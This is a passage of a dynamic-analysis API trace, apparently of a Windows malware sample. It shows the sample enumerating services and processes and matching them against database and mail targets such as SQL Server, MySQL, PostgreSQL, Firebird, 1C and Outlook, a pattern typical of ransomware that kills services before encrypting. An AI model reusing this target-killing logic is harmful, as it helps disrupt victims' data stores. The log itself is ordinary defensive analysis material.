	[0038.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0038.480] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0038.480] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0038.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0038.480] lstrlenW (lpString="DPS") returned 3
	[0038.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0038.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0038.480] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0038.480] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0038.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0038.480] lstrlenW (lpString="eventlog") returned 8
	[0038.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0038.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0038.480] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0038.480] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0038.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0038.480] lstrlenW (lpString="EventSystem") returned 11
	[0038.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0038.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0038.480] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0038.480] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0038.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0038.480] lstrlenW (lpString="gpsvc") returned 5
	[0038.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0038.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0038.481] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0038.481] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0038.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0038.481] lstrlenW (lpString="iphlpsvc") returned 8
	[0038.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0038.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0038.481] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0038.481] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0038.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0038.481] lstrlenW (lpString="LanmanServer") returned 12
	[0038.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0038.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0038.481] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0038.481] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0038.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0038.481] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0038.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0038.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0038.481] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0038.481] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0038.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0038.481] lstrlenW (lpString="lmhosts") returned 7
	[0038.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0038.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0038.481] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0038.481] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0038.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0038.481] lstrlenW (lpString="MMCSS") returned 5
	[0038.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0038.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0038.481] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0038.481] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0038.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0038.481] lstrlenW (lpString="MpsSvc") returned 6
	[0038.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0038.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0038.482] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0038.482] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0038.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0038.482] lstrlenW (lpString="Netman") returned 6
	[0038.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0038.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0038.482] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0038.482] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0038.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0038.482] lstrlenW (lpString="netprofm") returned 8
	[0038.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0038.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0038.482] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0038.482] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0038.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0038.482] lstrlenW (lpString="NlaSvc") returned 6
	[0038.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0038.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0038.482] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0038.482] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0038.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0038.482] lstrlenW (lpString="nsi") returned 3
	[0038.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0038.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0038.482] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0038.482] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0038.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0038.482] lstrlenW (lpString="PcaSvc") returned 6
	[0038.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0038.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0038.482] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0038.482] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0038.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0038.483] lstrlenW (lpString="PlugPlay") returned 8
	[0038.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0038.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0038.483] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0038.483] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0038.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0038.483] lstrlenW (lpString="Power") returned 5
	[0038.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0038.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0038.483] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0038.483] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0038.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0038.483] lstrlenW (lpString="ProfSvc") returned 7
	[0038.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0038.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0038.483] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0038.483] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0038.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0038.483] lstrlenW (lpString="RpcEptMapper") returned 12
	[0038.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0038.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0038.483] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0038.483] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0038.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0038.483] lstrlenW (lpString="RpcSs") returned 5
	[0038.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0038.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0038.483] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0038.483] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0038.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0038.483] lstrlenW (lpString="SamSs") returned 5
	[0038.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0038.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0038.483] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0038.484] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0038.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0038.484] lstrlenW (lpString="Schedule") returned 8
	[0038.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0038.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0038.484] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0038.484] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0038.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0038.484] lstrlenW (lpString="SENS") returned 4
	[0038.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0038.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0038.484] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0038.484] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0038.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0038.484] lstrlenW (lpString="ShellHWDetection") returned 16
	[0038.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0038.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0038.484] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0038.484] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0038.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0038.484] lstrlenW (lpString="Spooler") returned 7
	[0038.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0038.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0038.484] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0038.484] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0038.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0038.484] lstrlenW (lpString="SysMain") returned 7
	[0038.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0038.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0038.484] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0038.484] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0038.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0038.484] lstrlenW (lpString="Themes") returned 6
	[0038.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0038.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0038.485] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0038.485] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0038.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0038.485] lstrlenW (lpString="TrkWks") returned 6
	[0038.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0038.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0038.485] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0038.485] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0038.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0038.485] lstrlenW (lpString="UxSms") returned 5
	[0038.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0038.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0038.485] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0038.485] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0038.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0038.485] lstrlenW (lpString="VSS") returned 3
	[0038.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1
	[0038.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1
	[0038.485] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1
	[0038.485] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1
	[0038.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1
	[0038.485] lstrlenW (lpString="WdiServiceHost") returned 14
	[0038.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0038.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0038.485] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0038.485] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0038.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0038.485] lstrlenW (lpString="WdiSystemHost") returned 13
	[0038.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0038.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0038.485] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0038.485] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0038.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0038.485] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0038.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0038.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0038.486] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0038.486] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0038.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0038.486] lstrlenW (lpString="Winmgmt") returned 7
	[0038.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0038.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0038.486] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0038.486] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0038.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0038.486] lstrlenW (lpString="WPDBusEnum") returned 10
	[0038.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0038.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0038.486] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0038.486] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0038.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0038.486] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e5ca88 | out: hHeap=0x7d60000) returned 1
	[0038.486] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x190
	[0038.488] Process32FirstW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0038.489] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0038.489] lstrlenW (lpString="System") returned 6
	[0038.489] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0038.489] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0038.489] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0038.489] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0038.489] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0038.489] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0038.489] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0038.489] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0038.490] lstrlenW (lpString="smss.exe") returned 8
	[0038.490] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0038.490] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0038.490] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0038.490] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0038.490] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0038.490] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0038.490] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0038.490] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0038.490] lstrlenW (lpString="csrss.exe") returned 9
	[0038.490] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0038.490] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0038.490] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0038.490] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0038.490] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0038.490] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0038.491] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0038.491] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0038.491] lstrlenW (lpString="wininit.exe") returned 11
	[0038.491] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0038.491] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0038.491] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0038.491] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0038.491] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0038.491] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0038.491] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0038.491] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0038.492] lstrlenW (lpString="csrss.exe") returned 9
	[0038.492] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0038.492] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0038.492] lstrlenW (lpString="winlogon.exe") returned 12
	[0038.492] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0038.493] lstrlenW (lpString="services.exe") returned 12
	[0038.493] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0038.493] lstrlenW (lpString="lsass.exe") returned 9
	[0038.493] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0038.494] lstrlenW (lpString="lsm.exe") returned 7
	[0038.494] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0038.494] lstrlenW (lpString="svchost.exe") returned 11
	[0038.494] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0038.495] lstrlenW (lpString="svchost.exe") returned 11
	[0038.495] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0038.495] lstrlenW (lpString="svchost.exe") returned 11
	[0038.495] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0038.496] lstrlenW (lpString="svchost.exe") returned 11
	[0038.496] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0038.496] lstrlenW (lpString="svchost.exe") returned 11
	[0038.496] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0038.497] lstrlenW (lpString="audiodg.exe") returned 11
	[0038.497] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0038.497] lstrlenW (lpString="svchost.exe") returned 11
	[0038.497] Process32NextW (in: hSnapshot=0x190, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0038.498] lstrlenW (lpString="svchost.exe") returned 11
